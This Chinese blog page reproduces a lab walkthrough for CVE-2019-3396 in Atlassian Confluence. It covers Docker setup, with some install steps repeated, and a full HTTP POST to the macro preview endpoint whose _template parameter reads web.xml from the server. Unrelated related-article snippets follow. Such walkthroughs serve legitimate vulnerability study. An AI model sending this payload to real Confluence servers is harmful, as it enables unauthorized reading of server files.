Atlassian Confluence 路径遍历和命令执行漏洞 (CVE-2019-3396)

news2024/11/16 15:59:12

漏洞描述

Confluence 是由澳大利亚软件公司 Atlassian 开发的基于 Web 的企业 wiki。

Atlassian Confluence 6.14.2 版本之前存在一个未经授权的目录遍历漏洞,攻击者可以使用 Velocity 模板注入读取任意文件或执行任意命令。

漏洞环境及漏洞利用

启动docker环境

环境启动后,访问,您将看到安装指南,选择“试用安装”,然后系统会要求您填写许可证密钥。您应该向 Atlassian 申请 Confluence Server 测试证书:http://your-ip:8090

然后只需单击“下一步”即可安装。小内存VPS这一步可能无法安装或耗时较长(建议使用4G以上内存的机器进行安装测试),请耐心等待。

如果系统提示填写群集节点,则可以用 填充路径。/home/confluence

然后只需单击“下一步”即可安装。小内存VPS这一步可能无法安装或耗时较长(建议使用4G以上内存的机器进行安装测试),请耐心等待。

如果系统提示填写群集节点,则可以用 填充路径。/home/confluence

如此配置即可,账号密码都为postgres

 

完成所有配置看到以下画面

burp发送payload即可验证漏洞

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 177

{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":"./web.xml"}}}

 

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1242932.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

主播产品塑造话术

产品卖点 一、品质卓越 我们的产品始终坚持高品质的标准,从原材料的选择到生产工艺的把控,每一个环节都经过严格的品质检测。我们注重产品的耐用性和稳定性,确保您在使用过程中无需担心质量问题。 二、功能强大 我们的产品不仅具备基本的…

HTTP ERROR 403 No valid crumb was included in the request

1、报错截图: 2、产生原因: 开启了csrf,即跨站请求伪造 3、新版本不支持页面修改,故需要修改jenkins配置文件 3.1 进入编辑配置文件 vim /etc/sysconfig/jenkins 3.2 修改JENKINS_JAVA_OPTIONS,并保存修改 JENKI…

获取地区天气

上网找了半天js获取天气的方法,试了好几个都不行,还是得用api才行 1.用的心知天气的api 很简单,注册就能用,调用api需要key,官方网站:https://gaofen.mlogcn.com/documentation/0/00 2.areacode 这个网页里面找 精确到县:https:/…

mysql允许远程连接

1. 检查服务器防火墙 防火墙若开启则需要开放mysql使用的3306端口才可远程访问; 若无安全性要求也可以直接关闭防火墙。 防火墙相关命令: # 检查防火墙状态 systemctl status firewalld # 开启防火墙 systemctl start firewalld # 停止防火墙 systemctl …

【医学图像处理】超详细!PET图像批量预处理

目录 一、单个PET图像预处理1、使用[MRIConvert](https://pan.baidu.com/s/1cn3kgeVRir8HvP6HHm0M0Q?pwd5rt5)处理DCM2、MRI和PET数据预处理过程1) 打开matlab命令行输入spm pet,打开SMP12,界面如下2) Realign,只需要…

分布式锁之基于zookeeper实现分布式锁(三)

3. 基于zookeeper实现分布式锁 实现分布式锁目前有三种流行方案,分别为基于数据库、Redis、Zookeeper的方案。这里主要介绍基于zk怎么实现分布式锁。在实现分布式锁之前,先回顾zookeeper的相关知识点 3.1. 知识点回顾 3.1.1. 安装启动 安装&#xff1a…

面试送分题!“商品分类浏览”如何测试?

电商项目无论是工作中,还是面试中,都是一个高频出现的词。 面试官非常热衷提问关于电商项目的问题。例如商品分类怎么测试?购物车怎么测试?订单怎么测试?优惠券怎么测试?支付怎么测试?等等。 …

linux通过串口传输文件

简介 在嵌入式调试过程中,我们经常会使用调试串口来查看Log或者执行指令,其实,调试串口还有另一种功能,就是传输文件,本文说明使用MobaXterm串口工具来传输文件。 环境要求 嵌入式系统需要安装lsz和lrz,…

汲古融新,字有乾坤—字体设计商业项目实践

《字迹:字体设计商业项目实践》主要内容为商业字体设计,对于字体设计的理论知识进行透彻讲解,并配以详尽的设计案例。全书包含6章:第1章为字体设计基础知识,以梳理字体设计理论知识为主要内容;第2章为字体设…

01-详细介绍函数式接口和Lambda表达式语法

函数式接口介绍 如果在一个接口中只声明了一个抽象方法,则此接口就被称为函数式接口(该接口可以包含其他非抽象方法) 接口上使用FunctionalInterface注解可以验证该接口是否为函数式接口,javadoc生成的文档时也会保留该注解, 若接口中有多个抽象方法编译器会报错 随着Python…

一文详解Vue生命周期

Vue是一种流行的用于构建用户界面的渐进式JavaScript框架。Vue框架在开发过程中,特别强调对生命周期的理解和管理。通过使用生命周期钩子函数,开发者能够精确地控制Vue实例的创建、挂载、更新以及销毁过程。本文将对Vue的生命周期进行详细的介绍&#xf…

航天博物馆3D虚拟交互展厅让大众对科技发展有更深切的理解和感受

博物馆作为人们了解历史、文化和艺术的重要场所,现在可以通过VR全景技术来进行展览,让参观者身临其境地感受历史文化的魅力。本文将介绍博物馆VR全景的特点、优势,以及如何使用VR全景技术来使得博物馆的展览和教育活动更丰富。 VR数字博物馆…

2023年“福建省工业互联网+智能制造创新大赛”开启报名

11月22日,由福建省总工会、福建省大数据集团有限公司共同举办的2023年“福建省工业互联网智能制造创新大赛”启动报名。 大赛积极响应《福建省总工会等八部门关于广泛深入开展劳动和技能竞赛为新发展阶段新福建建设建工立业的意见》(闽工〔2022〕70号&am…

String 真的不可变吗?

为什么 String 类不可变 final修饰符: String类被声明为final,这意味着它不能被继承。因此,无法创建String的子类来修改其行为。私有字符数组(char[]): String类内部使用私有的字符数组来存储字符串的内容…

最优化理论

最优化理论 资料一optimal condition 最优性条件概念 二一维搜索逐次下降法iterative decent单峰函数二分法 dichotomous search 三 资料 B站最优化理论与算法 上交最优化方法 一 目标函数:需要优化的函数 决策变量,可以调整变化的量 约束集&#xff…

GitHub上8个强烈推荐的 Python 项目

文章目录 前言1. Manim2. DeepFaceLab3. Airflow4. GPT-25. XSStrike6. 谷歌图片下载7. Gensim8. SocialMapper总结关于Python技术储备一、Python所有方向的学习路线二、Python基础学习视频三、精品Python学习书籍四、Python工具包项目源码合集①Python工具包②Python实战案例③…

【Linux】 id命令使用

id id命令来显示用户的UID、组GID。 著者 由阿诺德罗宾斯和大卫麦肯齐撰写。 语法 id [参数] [用户名] id命令 -Linux手册页 命令选项及作用 执行令 id --help 执行命令结果 参数 -g 或 --group  显示用户所属群组的ID。-G 或 --groups  显示用户所属附加群组的ID。…

微信报名怎么做_轻松便捷的数字化报名体验

微信报名:轻松便捷的数字化报名体验 在这个数字化时代,微信已经成为我们生活中不可或缺的一部分。它不仅仅是一个社交平台,更是一个功能强大的综合性工具。其中,微信报名功能更是给我们的生活带来了极大的便利。本文将详细介绍微…

11-23 SSM4

Ajax 同步请求 :全局刷新的方式 -> synchronous请求 客户端发一个请求,服务器响应之后你客户端才能继续后续操作,请求二响应完之后才能发送后续的请求,依次类推 有点:服务器负载较小,但是由于服务器相应…